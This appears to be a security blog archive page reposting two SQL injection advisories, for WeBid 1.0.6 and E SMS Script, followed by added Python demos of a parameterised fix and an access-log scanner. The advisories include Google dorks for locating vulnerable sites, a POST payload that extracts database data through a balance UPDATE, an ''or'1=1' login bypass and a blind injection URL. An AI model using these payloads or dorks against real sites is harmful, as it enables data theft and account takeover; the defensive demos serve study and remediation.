Archive for 11 January 2013

WeBid 1.0.6 SQL Injection Vulnerability

The details of the SQL injection vulnerability found in WeBid version 1.0.6 are as follows:

# Exploit Title: WeBid 1.0.6 SQL Injection Vulnerability
# Google Dork: "Powered by WeBid"
# Date: 1/9/13
# Exploit Author: Life Wasted
# Vendor Homepage:
# Version: Tested on 1.0.6, but could affect other versions
# Tested On: Linux, Windows

Vulnerable Code:
Line 53 of the validate.php file
Lines 198 through 202 and 234 in the includes/functions_fees.php file

Proof of Concept:
validate.php?toocheckout=asdf calls the toocheckout_validate() function
toocheckout_validate() takes unsanitized post input from 2 different parameters (total and cart_order_id)
toocheckout_validate() calls callback_process() if the post parameter credit_card_processed is equal to 'Y'
The unsanitized parameters are used in an UPDATE query:
$query = "UPDATE " . $DBPrefix . "users SET balance = balance + " . $payment_amount . $addquery . " WHERE id = " . $custom_id;
This allows an attacker to retrieve data using a time-based blind injection technique or by updating a pre-existing value to the output of an embedded query.

For example, the attacker could send the following post data to extract the name of the current database.
POST DATA: cart_order_id=*Attackers UserID*WEBID1&credit_card_processed=Y&total=1, name=(SELECT database())

The resulting query would be:
UPDATE users SET balance = balance + 1, name=(SELECT database()) WHERE id = *Attackers User ID*

Then the attacker could sign in to their account and view the requested data by going to the edit_data.php page
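As an added illustration that is not part of the advisory and not WeBid's own code: the concatenated UPDATE quoted above, reproduced against an in-memory SQLite table that stands in for the MySQL users table, next to a hardened version that validates the two POST values and binds them as parameters. The table layout, user id 7, the starting balance and sqlite_version() (standing in for MySQL's database(), which SQLite lacks) are all constructed for this demo.

```python
import re
import sqlite3

SQLITE_VERSION = sqlite3.sqlite_version

# Injected value in the shape shown in the advisory ("1, name=(SELECT database())"),
# with sqlite_version() standing in for MySQL's database(). Constructed for this demo.
PAYLOAD = "1, name=(SELECT sqlite_version())"


def make_db():
    """Constructed stand-in for the users table: id, name, balance."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, balance REAL)")
    con.execute("INSERT INTO users VALUES (7, 'alice', 10.0)")
    con.commit()
    return con


def credit_vulnerable(con, custom_id, payment_amount):
    """String-concatenated UPDATE with the same shape as the quoted WeBid query.
    Both values come straight from the request, so either one can carry SQL."""
    query = ("UPDATE users SET balance = balance + " + payment_amount
             + " WHERE id = " + custom_id)
    con.execute(query)
    con.commit()


def parse_user_id(raw):
    """Accept only a plain positive integer; anything else is rejected."""
    if not re.fullmatch(r"[1-9][0-9]{0,9}", raw):
        raise ValueError("user id must be a positive integer")
    return int(raw)


def parse_amount(raw):
    """Accept only a plain decimal amount such as '1' or '12.50'."""
    if not re.fullmatch(r"[0-9]{1,10}(\.[0-9]{1,2})?", raw):
        raise ValueError("amount must be a plain decimal number")
    return float(raw)


def credit_hardened(con, custom_id, payment_amount):
    """Validate first, then bind the values as parameters. The SQL text never
    changes, so a payload cannot smuggle in a second SET clause."""
    uid = parse_user_id(custom_id)
    amount = parse_amount(payment_amount)
    con.execute("UPDATE users SET balance = balance + ? WHERE id = ?", (amount, uid))
    con.commit()


def row(con, uid):
    return con.execute("SELECT name, balance FROM users WHERE id = ?", (uid,)).fetchone()


def run_demo():
    """Run the payload through both versions and report the state of the row."""
    vuln = make_db()
    credit_vulnerable(vuln, "7", PAYLOAD)
    vuln_name, vuln_balance = row(vuln, 7)

    hard = make_db()
    try:
        credit_hardened(hard, "7", PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    hard_name, hard_balance = row(hard, 7)

    # A legitimate request still works against the hardened version.
    credit_hardened(hard, "7", "1")
    _, hard_balance_after_ok = row(hard, 7)

    return {
        "vulnerable": {"name": vuln_name, "balance": vuln_balance},
        "hardened": {"rejected": rejected, "name": hard_name,
                     "balance": hard_balance, "balance_after_ok": hard_balance_after_ok},
    }


if __name__ == "__main__":
    print(run_demo())
```

In the vulnerable path the payload turns the single-column update into `balance = balance + 1, name=(SELECT ...)`, so the subquery's result lands in the name column where the account owner can read it, exactly the mechanism the advisory describes. The hardened path rejects the value before any SQL is built, and even if validation were skipped, a bound parameter is a value, not SQL text.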

E SMS Script Multiple SQL Injection Vulnerabilities

A blind SQL injection vulnerability has been found in the smscollection.php?cat_id= parameter; through this vulnerability, the data can be accessed.

# E SMS Script Multiple SQL Injection Vulnerability
# By cr4wl3r
# Good Music: 🙂
# Script:
# Dork: inurl:"smscollection.php?cat_id="

Proof of concept:

Auth Bypass

  Username: cr4wl3r
  Password: 'or'1=1

Blind SQLi

  http://bastardlabs/smscollection.php?cat_id=[Blind SQLi]
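For the cat_id vector above, as an added example that is neither the advisory author's nor the script's own code: a small scanner that reads web-server access-log lines, URL-decodes each query string and flags requests whose cat_id (a parameter the application only ever uses as an integer id) is not a plain integer, or whose parameters carry a quote character. The log lines, IP addresses and the INTEGER_PARAMS allow-list are constructed for this demo.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Common Log Format lines; none come from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Jan/2013:10:00:01 +0200] "GET /smscollection.php?cat_id=3 HTTP/1.1" 200 5120
203.0.113.9 - - [11/Jan/2013:10:00:07 +0200] "GET /smscollection.php?cat_id=3%20OR%201%3D1 HTTP/1.1" 200 5120
203.0.113.9 - - [11/Jan/2013:10:00:15 +0200] "GET /smscollection.php?cat_id=3%27 HTTP/1.1" 500 220
203.0.113.5 - - [11/Jan/2013:10:00:20 +0200] "GET /index.php?page=home HTTP/1.1" 200 900
"""

# ip, ident, user, [timestamp], "METHOD path protocol", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Parameters the application only ever uses as integer ids (constructed allow-list).
INTEGER_PARAMS = {"cat_id"}


def parse_line(line):
    """Split one log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def check_query(ip, path):
    """Return findings for one request as (ip, param, decoded value, reason)."""
    findings = []
    query = urlsplit(path).query
    if not query:
        return findings
    # parse_qs percent-decodes, so %27 and %3D are inspected as ' and =
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if name in INTEGER_PARAMS and not value.isdigit():
                findings.append((ip, name, value, "non-integer value in integer-only parameter"))
            elif "'" in value or '"' in value:
                findings.append((ip, name, value, "quote character in parameter"))
    return findings


def scan_log(text):
    """Scan every parseable line and collect the findings in log order."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        findings.extend(check_query(rec["ip"], rec["path"]))
    return findings


if __name__ == "__main__":
    for ip, name, value, reason in scan_log(SAMPLE_LOG):
        print(f"{ip}\t{name}={value!r}\t{reason}")
```

The integer allow-list is the useful part: a blind injection on an id parameter cannot succeed with a value that is only digits, so any other value in that parameter is worth an alert regardless of what the payload looks like. The 500 on the third line is the kind of side signal worth correlating with the finding, since a stray quote that breaks the query usually surfaces as a server error.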